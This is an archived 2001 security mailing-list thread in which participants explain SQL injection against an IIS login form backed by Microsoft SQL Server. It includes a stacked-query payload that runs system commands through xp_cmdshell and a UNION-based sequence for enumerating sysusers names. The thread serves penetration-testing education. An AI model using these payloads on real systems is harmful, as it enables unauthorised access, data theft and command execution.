Andrew said: >Don't you need the returned recordset to be written to the html stream in >order to see anything useful? For instance if you are just looking at a >login page you may not get any joy with appending extra SELECTs? We have >just been playing with exactly this! > >Andrew Miller .. yes, but .. the first thing is .. there is no need for html-output when you can execute system-commands (xp_cmdshell..,sp_adduser etc ....) and htmloutput can be achieved by a) using aliases (AS) b) brute-force the column(s) you can see within output using "UNION" HowTo: 1)guess the number of columns from table A by Column-Padding (see example) 2)find the right column number within Query (see example) 3)if necessary typecast columns example: ---cut here--- sequence I [original] union select '1' from sysusers;-- [original] union select '1','1' from sysusers;-- [original] union select '1','1','1' from sysusers;-- [original] union select '1','1','1','1'from sysusers;-- after no error message sequence II [original] union select name,'1','1','1' from sysusers;-- [original] union select '1',name,'1','1' from sysusers;-- [original] union select '1','1',name,'1','1' from sysusers;-- .. until name appears within html .... tataa ---cut here--- nice day, rc securityat_private http://www.freefly.com/security/ >You migh (90% chance) have a possibility to > >a) alter the database >b) execute remote commands in the SQL server > >This is a common error (not quoting quotes :), this is due to the SQL >statement being executed in the ISS server (through an ODBC connection) >is just added the information given by the user. > >Thus: > >SELECT * from test where value='$user' > >if user=' becomes: > >SELECT * from test where value=''' > >which generates your error. > >However, you can do the following >if user=test'; select * from test -- becomes: > >SELECT * from test where value='test'; select * from test -- ' > >which is a valid SQL statement (two as a matter of fact) and >if user=test'; exec master..xp_cmdshell 'dir' -- becomes: > >SELECT * from test where value='test'; exec master..xp_cmdshell 'dir' -- > > >which will run the 'dir' command in the SQL server (not in the IIS!) >This is fun >since, in some cases, the ISS server is in a DMZ and the SQL server is >in the internal >lan or through another firewall like this: > >Internet ----- Fw -------- Fw --------- Local network > | | > IIS SQL server > >or > >Internet ----- Fw -------- Local network > | | > IIS SQL server > > >So you might be one step closer to your target ! > >Some references (fresh out from google): >http://www.sqlsecurity.com/faq-inj.asp >http://www.silksoft.co.za/data/sqlinjectionattack.htm > > Regards > > > Javier Fernández-Sanguino Peña > > > > > Hello all, > > > > > > I am doing a pen test against a IIS 5 web server. The web > > server requires a > > user name and password via a logon form. if a single quote > > character is > > entered (username)the following error is produced > > > > [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark > > before the character string '' and password=''. > > > > I remember reading somewhere that this can be used to gain > > further access? > > but i cant find the info. > > > > Can any one help? > > > > Thanks in advance. > > > > Gary > > > > > > -------------------------------------------------------------- > > -------------- > > This list is provided by the SecurityFocus Security > > Intelligence Alert (SIA) > > Service. For more information on SecurityFocus' SIA service which > > automatically alerts you to the latest security > > vulnerabilities please see: > > https://alerts.securityfocus.com/ > > > >---------------------------------------------------------------------------- >This list is provided by the SecurityFocus Security Intelligence Alert >(SIA) >Service. For more information on SecurityFocus' SIA service which >automatically alerts you to the latest security vulnerabilities please see: >https://alerts.securityfocus.com/ > > >_____________________________________________________________________ >This message has been checked for all known viruses by bluesource. For >further information visit www.blue-source.com > >powered by Messagelabs > > >------------Insight Consulting Limited-------------------------------- >Insight Consulting Limited is a leading specialist provider of independent >services in all aspects of information and communications security, >business continuity and risk management from consultancy, implementation, >testing and training to recruitment, research and outsourcing. >---------------------Disclaimer---------------------------------------- >Internet communications are not secure and therefore Insight Consulting >Limited does not accept legal responsibility for the contents of this >message. Any views or opinions presented are solely those of the author >and do not necessarily represent those of Insight Consulting Limited unless >otherwise specifically stated. If this message is received by anyone other >than the addressee, please notify the sender and then delete the message >and any attachments from your computer. >----------------------------------------------------------------------- > >---------------------------------------------------------------------------- >This list is provided by the SecurityFocus Security Intelligence Alert >(SIA) >Service. For more information on SecurityFocus' SIA service which >automatically alerts you to the latest security vulnerabilities please see: >https://alerts.securityfocus.com/ > _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Thu Nov 22 2001 - 09:41:28 PST